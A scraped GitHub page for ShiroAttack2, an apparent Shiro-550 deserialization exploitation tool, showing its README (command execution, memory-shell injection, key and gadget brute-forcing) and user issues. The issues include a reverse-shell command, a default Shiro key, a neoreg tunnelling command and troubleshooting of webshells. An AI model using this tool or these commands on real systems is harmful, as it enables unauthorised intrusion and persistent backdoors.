summersec / shiroattack2 Goto Github PK

View Code? Open in Web Editor NEW

1.9K 25.0 250.0 203.16 MB

shiro反序列化漏洞综合利用,包含（回显执行命令/注入内存马）修复原版中NoCC的问题 https://github.com/j1anFen/shiro_attack

License: MIT License

Java 100.00%

shiro shiro-security shiroexp shiro550

shiroattack2's Introduction

ShiroAttack2

一款针对Shiro550漏洞进行快速漏洞利用

前言

关于该工具更新内容介绍后续会更新到博客下面https://shiro.sumsec.me/

工具特点

javafx
处理没有第三方依赖的情况
支持多版本CommonsBeanutils的gadget
支持内存马
采用直接回显执行命令
添加了更多的CommonsBeanutils版本gadget
支持修改rememberMe关键词
支持直接爆破利用gadget和key
支持代理
添加修改shirokey功能（使用内存马的方式）可能导致业务异常
支持内存马小马
添加DFS算法回显（AllECHO）
支持自定义请求头，格式：abc:123&&&test:123

FAQ 常见问题见

FAQ

使用方法

直接使用shiro_attack-{version}-SNAPSHOT-all.jar第三版

在jar的当前目录下创建一个data文件夹，里面创建一个shiro_keys.txt文件，文件内容是shiro_key。lib目前是CommonsBeanutils依赖的版本。

🅱️免责声明

该工具仅用于安全自查检测

由于传播、利用此工具所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。

本人拥有对此工具的修改和解释权。未经网络安全部门及相关部门允许，不得善自使用本工具进行任何攻击活动，不得以任何方式将其用于商业目的。

该工具只授权于企业内部进行问题排查，请勿用于非法用途，请遵守网络安全法，否则后果作者概不负责

shiroattack2's People

Contributors

Stargazers

Watchers

Forkers

istoliving x-team-robots xiumulty m0tky fynch3r fengzihk bypasscc yyming-sudo key1624 evi1r0s3 coffeehb-org jxpsx hack404-007 sry309 yut0u akpotter ccqtv123 fa1c0n1 ghost2097221 cx01-debug functfan afwu m00nt0 kangd1w2 atorninja jonathan1727 jindom yeshuibo depycode rassec gh-jy redwifiteam gysf666 dk47os3r misskiki portmouth freeide 086667 jx0n0 empty2081 yilucode roixroi little-2pig whesyar d4rkduck yizhimanpadewoniu goowen ddostest123 m310n whami-root 7ten7 h0ngzh0ng aaisui awake-ui bearowang lyrhy tuziv hanmmgit jeromeyoung imemaker icxtoken nannanshen liuhengliang666 smartzh asura88 snowlovely fbion fanyibo2009 yswanmei libaizaishuijiao jerryiso listenquiet kenuosec safe6sec 1275dfac-c79e-9148-8949-c53714c0920d bgrstar codechina888 pershing9909 crackercat kungia09 beerandgin old-stan firedon sftrwo harris2015 hackerxj007 dingxiao77 wiwei132 chenqi92 ekixu tttttint allblue147 ksrconeksrcone want2live233 zzwlpx bravery9 yukissx yolel lay0us1 du1ge

shiroattack2's Issues

运行出错 java10

{Transfer-Encoding=[chunked], null=[HTTP/1.1 200], Connection=[close], Vary=[Access-Control-Request-
Headers, Access-Control-Request-Method, Origin], Set-Cookie=[rememberMe=deleteMe; Path=/; Max-Age=0;
Expires=Wed, 06-Jul-2022 11:47:49 GMT; SameSite=lax], Date=[Thu, 07 Jul 2022 11:47:49 GMT], Content
-Type=[application/json]}{"msg":"运行时异常:null","code":500}
SLF4J: Failed to load class "org.slf4j.impl.StaticLoggerBinder".
SLF4J: Defaulting to no-operation (NOP) logger implementation
SLF4J: See http://www.slf4j.org/codes.html#StaticLoggerBinder for further details.
MLog initialization issue: slf4j found no binding or threatened to use its (dangerously silent) NOPL
ogger. We consider the slf4j library not found.
Exception in thread "Thread-3" java.lang.NoClassDefFoundError: javax/xml/bind/DatatypeConverter
at com.summersec.attack.deser.frame.Shiro.sendpayload(Shiro.java:33)
at com.summersec.attack.core.AttackService$1.run(AttackService.java:332)
at java.base/java.lang.Thread.run(Unknown Source)
Caused by: java.lang.ClassNotFoundException: javax.xml.bind.DatatypeConverter
at java.base/jdk.internal.loader.BuiltinClassLoader.loadClass(Unknown Source)
at java.base/jdk.internal.loader.ClassLoaders$AppClassLoader.loadClass(Unknown Source)
at java.base/java.lang.ClassLoader.loadClass(Unknown Source)
... 3 more
7月 07, 2022 7:47:57 下午 com.mchange.v2.log.MLog
信息: MLog clients using java 1.4+ standard logging.

change shiro key 失败

背景：vulfocus和vulhub的shiro靶场
工具版本：4.5.2
更改shiro key时提示注入失败，其他的内存马注入正常

为什么注入不了内存马，冰蝎蚂蚁都不行，说是换目录也不行，怎么办呢？

java16运行乱码

java version "16.0.2"
大佬，我不太懂java哈，配置了javafx环境，环境如下

export PATH_TO_FX=/Library/Java/JavaVirtualMachines/jdk-16.0.2.jdk/javafx-sdk-11.0.2/lib

运行 shiro_attack-4.5-SNAPSHOT-all.jar 出现乱码，还有报错提示信息如下

java --module-path $PATH_TO_FX --add-modules=javafx.controls --add-modules=javafx.fxml --add-modules=javafx.base --add-modules=javafx.graphics --add-modules=javafx.web -jar shiro_attack-4.5-SNAPSHOT-all.jar

2021-12-16 15:49:41.187 java[89289:289238] CoreText note: Client requested name ".SFNS-Regular", it will get Times-Roman rather than the intended font. All system UI font access should be through proper APIs such as CTFontCreateUIFontForLanguage() or +[NSFont systemFontOfSize:].
2021-12-16 15:49:41.187 java[89289:289238] CoreText note: Set a breakpoint on CTFontLogSystemFontNameRequest to debug.
2021-12-16 15:49:41.199 java[89289:289238] CoreText note: Client requested name ".SFNS-Regular", it will get Times-Roman rather than the intended font. All system UI font access should be through proper APIs such as CTFontCreateUIFontForLanguage() or +[NSFont systemFontOfSize:].
2021-12-16 15:49:41.601 java[89289:289278] CoreText note: Client requested name ".SFNS-Regular", it will get Times-Roman rather than the intended font. All system UI font access should be through proper APIs such as CTFontCreateUIFontForLanguage() or +[NSFont systemFontOfSize:].
2021-12-16 15:49:41.657 java[89289:289278] CoreText note: Client requested name ".SFNS-Regular", it will get Times-Roman rather than the intended font. All system UI font access should be through proper APIs such as CTFontCreateUIFontForLanguage() or +[NSFont systemFontOfSize:].
2021-12-16 15:49:41.657 java[89289:289278] CoreText note: Client requested name ".SFNS-Regular", it will get Times-Roman rather than the intended font. All system UI font access should be through proper APIs such as CTFontCreateUIFontForLanguage() or +[NSFont systemFontOfSize:].
2021-12-16 15:49:41.726 java[89289:289278] CoreText note: Client requested name ".SFNS-Regular", it will get Times-Roman rather than the intended font. All system UI font access should be through proper APIs such as CTFontCreateUIFontForLanguage() or +[NSFont systemFontOfSize:].

请问只能使用JDK8运行吗，JDK11无法爆破出密钥

什么工业lj啊 jar包都没有

内存马注入可不可考虑listener型

这种内存马比filter和servlet都好

[TODO]利用TemplatesImpl执行字节码在实战中的踩坑记录

https://y4tacker.github.io/2023/04/25/year/2023/4/%E5%88%A9%E7%94%A8TemplatesImpl%E6%89%A7%E8%A1%8C%E5%AD%97%E8%8A%82%E7%A0%81%E5%9C%A8%E5%AE%9E%E6%88%98%E4%B8%AD%E7%9A%84%E8%B8%A9%E5%9D%91%E8%AE%B0%E5%BD%95/#%E5%88%A9%E7%94%A8TemplatesImpl%E6%89%A7%E8%A1%8C%E5%AD%97%E8%8A%82%E7%A0%81%E5%9C%A8%E5%AE%9E%E6%88%98%E4%B8%AD%E7%9A%84%E8%B8%A9%E5%9D%91%E8%AE%B0%E5%BD%95

注入内存马这个功能尤其是对于哥斯拉内存马注入了之后怎末用啊哥斯拉要密钥的呀，你这只有密码啊

爆破利用链的时候软件出错

mac环境卡死

mac 运行爆破秘钥会卡死,同样情况 windows 不存在

自定义UA头？

直接用工具跑发现识别不出Shiro框架，代理进burp发现走的流量500或502 。
而直接用浏览器打开代理进burp正常。
然后更改了下header头正常了，猜测工具header头可能被封或者有些网站必须加一些header头才能访问。

ShiroAttack2 4.5.2 版本检测失败，原版ShiroAttack 2.2成功执行

ShiroAttack2 4.5.2 版本

爆破过程速度慢，显示key是

[++] 存在shiro框架！
[++] 找到key：kPH+bIxk5D2deZiIxcaaaA==
[+] 爆破结束

ShiroAttack 2.2

爆破速度同样慢，但是准确，已经成功执行命令

POST请求下的利用BUG

POST方式请求时，没有post的body，导致shiro无法识别

linux系统，启动jar包报错显示没有找到主类

Could not find or load main class com.summersec.attack.UI.Mai

构造链问题

师傅，我在复现fofa靶场http://vulfocus.fofa.so/的shiro721的时候发现

这个工具找不到构造链

但是我用回原版的工具是可以找到的

麻烦帮忙看看是什么原因

有key无gadget

可以检测到默认key
但是检测不到利用链
这个是版本问题嘛

java.net.SocketException: Connection reset

师傅你好，我想问一下，工具在爆破密钥时正常，但是在爆破利用链的时候直接报错：java.net.SocketException: Connection reset。使用环境位java8，想咨询一下为啥会出现这种情况啊

高版本的java是否支持

我的是Java18无法运行jar

复杂请求bug

POST /login HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/525.28.3
Accept: text/html
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Cookie: rememberMe=yes
Content-Type: application/json
Host: test.com
Content-Length: 186

{"body":""}

在工具中设置 Content-Type: application/json 后发出的请求如上，出现两个Content-Type，且json格式的设置不生效；

这个比原版好用，原版获取不到密钥

提问须知！

如果遇到工具无法利用，但其他工具能利用的情况！解决方案：

你把这个站发给我邮箱，我测试并修复改进。
自己抓包，判断是否哪一个环节出现问题，然后尝试自己手动解决。现在这个shiro末年时代，现在能打的基本上都是疑难点，稀奇古怪的问题都会出现。
如果你们直接说问题了啥问题，我也没环境。无法复现，无法测试。
无法改key，请参考 issues17

哥斯拉内存马md5与初始化问题

哥斯拉的md5在构造函数中生成，而pwd在equals方法中获取，会导致所有的md5都是由默认密码生成的，哥斯拉初始化需要校验pass和xc的md5，只要修改密码就无法完成初始化

在密码是pass1的情况下md5还是md5(pass10243c6e0b8a9c15224a) = 38F3ABE85948D564D7028F042ACDF2CA
而正常情况下应该是md5(pass13c6e0b8a9c15224a) = 54AA0D501316027804089C32881B6C02

修改建议：
在doFilter()方法或者equals()方法处对md5进行赋值，

关于复杂请求

大佬能不能复杂请求直接是一个框啊
就像这样

现在工具上得复杂请求我试了很长时间没有试成功，另外就是post数据支持json格式么？

[TODO] 关于URLConnection 自解压问题解决办法

https://cloud.tencent.com/developer/article/2023746

报错：找不到或无法加载主类 com.summersec.attack.UI.Main

报错信息如下，包是从大佬的github直接down下来的，想问下大佬这个错误原因是什么

java -jar shiro_attack-4.5.6-SNAPSHOT-all.jar
错误: 找不到或无法加载主类 com.summersec.attack.UI.Main
原因: java.lang.NoClassDefFoundError: javafx/application/Application

java -version
java version "11.0.17" 2022-10-18 LTS
Java(TM) SE Runtime Environment 18.9 (build 11.0.17+10-LTS-269)
Java HotSpot(TM) 64-Bit Server VM 18.9 (build 11.0.17+10-LTS-269, mixed mode)

mac下无法爆破密钥

点击爆破密钥直接显示爆破结束：
[++] 存在shiro框架！
[+] 爆破结束
[++] 含有多个shiro场景

当前目录存在data/shiro_keys.txt，相同文件复制到win下可正常使用

反弹shell不成功

反弹shell已解决，但是反弹shell后工具就卡死
jdk1.8

哥斯拉内存马插件无法使用

哥斯拉内存马只传入了data数据，没有传入ServletContext等信息，导致除了基础功能外，插件都无法使用

解决方案
将
f.equals(arrOut);
f.equals(data);

改为
f.equals(arrOut);
f.equals(request);

即可

是否考虑增加suo5内存马

如题
https://github.com/zema1/suo5/blob/main/assets/Suo5Filter.java

未发现shiro框架！建议增加Cookie设置

无法爆破密钥

选择爆破密钥，出现多个shiro场景的描述，无法爆破密钥

commons-beanutils依赖问题debug

我在本地测试了一下4.3版本和最新版本打无CC shiro环境
如图：4.3可以打CommonsBeanutilsString，4.7不行

我去看了下4.3版本时的代码，CommonsBeanutilsString的payload代码一致，于是我怀疑问题在pom里
我看到4.3版本的pom里commons-beanutils是被注释掉的（https://github.com/SummerSec/ShiroAttack2/blob/e8508eba9182e12f27b0dba4ca17889155922f35/pom.xml）

于是我本地打包代码时注释掉了commons-beanutils，运行结果如下，修改了pom依赖的新版工具检测到了CommonsBeanutilsString，并命令执行成功

顺带一提，我还试了下把pom中commons-beanutils的版本从1.9.2改为1.8.3，打包后也能检测到CommonsBeanutilsString

希望对你debug有帮助

我怎末打不开，点击运行没反应

编译报错

/Users/white/Desktop/ShiroAttack2-master/src/main/java/com/summersec/attack/deser/payloads/CommonsBeanutilsAttrCompare.java:26:16
java: 找不到符号
符号: 方法 setValues(com.sun.org.apache.xerces.internal.dom.CoreDocumentImpl,java.lang.String,java.lang.String,java.lang.String)
位置: 类型为com.sun.org.apache.xerces.internal.dom.AttrNSImpl的变量 attrNS1

java version "1.8.0_301"
Java(TM) SE Runtime Environment (build 1.8.0_301-b09)
Java HotSpot(TM) 64-Bit Server VM (build 25.301-b09, mixed mode)

注入的冰蝎filter码成功，但是连不上，是啥原因？冰蝎filter和冰蝎sevlet有什么区别？

哥斯拉的内存马有问题

工具显示是注入内存马成功的
但是链接不上
使用的工具的链接和密码
密钥是使用哥斯拉默认的key，加密器协议是 Java 的 Base64 和 RAW 都试了，链接不上
尝试了好几个站，都存在这样子的问题

注入内存马会报错

用的jdk8的，执行命令都正常，注入内存马一开始也正常，然后注入了三次之后就报错，这个功能就用不了了，不太懂是什么原因

使用命令执行反弹 shell 报错

执行命令 bash -i >& /dev/tcp/xx.xx.xx.xx/xxx 0>&1 报错:
Exception in thread "JavaFX Application Thread" java.lang.RuntimeException: java.lang.reflect.InvocationTargetException
at javafx.fxml.FXMLLoader$MethodHandler.invoke(FXMLLoader.java:1774)
at javafx.fxml.FXMLLoader$ControllerMethodEventHandler.handle(FXMLLoader.java:1657)
at com.sun.javafx.event.CompositeEventHandler.dispatchBubblingEvent(CompositeEventHandler.java:86)
at com.sun.javafx.event.EventHandlerManager.dispatchBubblingEvent(EventHandlerManager.java:238)
at com.sun.javafx.event.EventHandlerManager.dispatchBubblingEvent(EventHandlerManager.java:191)
at com.sun.javafx.event.CompositeEventDispatcher.dispatchBubblingEvent(CompositeEventDispatcher.java:59)
at com.sun.javafx.event.BasicEventDispatcher.dispatchEvent(BasicEventDispatcher.java:58)
at com.sun.javafx.event.EventDispatchChainImpl.dispatchEvent(EventDispatchChainImpl.java:114)
at com.sun.javafx.event.BasicEventDispatcher.dispatchEvent(BasicEventDispatcher.java:56)
at com.sun.javafx.event.EventDispatchChainImpl.dispatchEvent(EventDispatchChainImpl.java:114)
at com.sun.javafx.event.BasicEventDispatcher.dispatchEvent(BasicEventDispatcher.java:56)
at com.sun.javafx.event.EventDispatchChainImpl.dispatchEvent(EventDispatchChainImpl.java:114)
at com.sun.javafx.event.BasicEventDispatcher.dispatchEvent(BasicEventDispatcher.java:56)
at com.sun.javafx.event.EventDispatchChainImpl.dispatchEvent(EventDispatchChainImpl.java:114)
at com.sun.javafx.event.EventUtil.fireEventImpl(EventUtil.java:74)
at com.sun.javafx.event.EventUtil.fireEvent(EventUtil.java:49)
at javafx.event.Event.fireEvent(Event.java:198)
at javafx.scene.Node.fireEvent(Node.java:8411)
at javafx.scene.control.Button.fire(Button.java:185)
at com.sun.javafx.scene.control.behavior.ButtonBehavior.mouseReleased(ButtonBehavior.java:182)
at com.sun.javafx.scene.control.skin.BehaviorSkinBase$1.handle(BehaviorSkinBase.java:96)
at com.sun.javafx.scene.control.skin.BehaviorSkinBase$1.handle(BehaviorSkinBase.java:89)
at com.sun.javafx.event.CompositeEventHandler$NormalEventHandlerRecord.handleBubblingEvent(CompositeEventHandler.java:218)
at com.sun.javafx.event.CompositeEventHandler.dispatchBubblingEvent(CompositeEventHandler.java:80)
at com.sun.javafx.event.EventHandlerManager.dispatchBubblingEvent(EventHandlerManager.java:238)
at com.sun.javafx.event.EventHandlerManager.dispatchBubblingEvent(EventHandlerManager.java:191)
at com.sun.javafx.event.CompositeEventDispatcher.dispatchBubblingEvent(CompositeEventDispatcher.java:59)
at com.sun.javafx.event.BasicEventDispatcher.dispatchEvent(BasicEventDispatcher.java:58)
at com.sun.javafx.event.EventDispatchChainImpl.dispatchEvent(EventDispatchChainImpl.java:114)
at com.sun.javafx.event.BasicEventDispatcher.dispatchEvent(BasicEventDispatcher.java:56)
at com.sun.javafx.event.EventDispatchChainImpl.dispatchEvent(EventDispatchChainImpl.java:114)
at com.sun.javafx.event.BasicEventDispatcher.dispatchEvent(BasicEventDispatcher.java:56)
at com.sun.javafx.event.EventDispatchChainImpl.dispatchEvent(EventDispatchChainImpl.java:114)
at com.sun.javafx.event.BasicEventDispatcher.dispatchEvent(BasicEventDispatcher.java:56)
at com.sun.javafx.event.EventDispatchChainImpl.dispatchEvent(EventDispatchChainImpl.java:114)
at com.sun.javafx.event.EventUtil.fireEventImpl(EventUtil.java:74)
at com.sun.javafx.event.EventUtil.fireEvent(EventUtil.java:54)
at javafx.event.Event.fireEvent(Event.java:198)
at javafx.scene.Scene$MouseHandler.process(Scene.java:3760)
at javafx.scene.Scene$MouseHandler.access$1500(Scene.java:3488)
at javafx.scene.Scene.impl_processMouseEvent(Scene.java:1765)
at javafx.scene.Scene$ScenePeerListener.mouseEvent(Scene.java:2497)
at com.sun.javafx.tk.quantum.GlassViewEventHandler$MouseEventNotification.run(GlassViewEventHandler.java:397)
at com.sun.javafx.tk.quantum.GlassViewEventHandler$MouseEventNotification.run(GlassViewEventHandler.java:295)
at java.security.AccessController.doPrivileged(Native Method)
at com.sun.javafx.tk.quantum.GlassViewEventHandler.lambda$handleMouseEvent$2(GlassViewEventHandler.java:434)
at com.sun.javafx.tk.quantum.QuantumToolkit.runWithoutRenderLock(QuantumToolkit.java:411)
at com.sun.javafx.tk.quantum.GlassViewEventHandler.handleMouseEvent(GlassViewEventHandler.java:433)
at com.sun.glass.ui.View.handleMouseEvent(View.java:555)
at com.sun.glass.ui.View.notifyMouse(View.java:941)
at com.sun.glass.ui.win.WinApplication._runLoop(Native Method)
at com.sun.glass.ui.win.WinApplication.lambda$null$4(WinApplication.java:185)
at java.lang.Thread.run(Thread.java:750)
Caused by: java.lang.reflect.InvocationTargetException
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at sun.reflect.misc.Trampoline.invoke(MethodUtil.java:71)
at sun.reflect.GeneratedMethodAccessor1.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at sun.reflect.misc.MethodUtil.invoke(MethodUtil.java:275)
at javafx.fxml.FXMLLoader$MethodHandler.invoke(FXMLLoader.java:1769)
... 52 more
Caused by: java.lang.ArrayIndexOutOfBoundsException: 1
at com.summersec.attack.core.AttackService.execCmdTask(AttackService.java:404)
at com.summersec.attack.UI.MainController.executeCmdBtn(MainController.java:124)
... 62 more

java.lang.NoClassDefFoundError: javax/xml/bind/DatatypeConverter

JAVA version openjdk 17.0.8.1 2023-08-24

cracking key error:
java.lang.NoClassDefFoundError: javax/xml/bind/DatatypeConverter

Exception in thread "Thread-4" java.lang.NoClassDefFoundError: javax/xml/bind/DatatypeConverter
at com.summersec.attack.deser.frame.Shiro.sendpayload(Shiro.java:33)
at com.summersec.attack.core.AttackService$2.run(AttackService.java:371)
at java.base/java.lang.Thread.run(Thread.java:833)
Caused by: java.lang.ClassNotFoundException: javax.xml.bind.DatatypeConverter
at java.base/jdk.internal.loader.BuiltinClassLoader.loadClass(BuiltinClassLoader.java:641)
at java.base/jdk.internal.loader.ClassLoaders$AppClassLoader.loadClass(ClassLoaders.java:188)
at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:525)

python neoreg.py -u http://domain/favicondemo.ico -k pass1024

+------------------------------------------------------------------------+
  Log Level set to [ERROR]
  Starting SOCKS5 server [127.0.0.1:1080]
  Tunnel at:
    http://domain/favicondemo.ico
+------------------------------------------------------------------------+
[ERROR   ]  [Ask NeoGeorg] NeoGeorg is not ready, please check URL and KEY. rep: [200]
[ERROR   ]  [Ask NeoGeorg] You can set the `--skip` parameter to ignore errors

NeoreGeorg version 5.0.1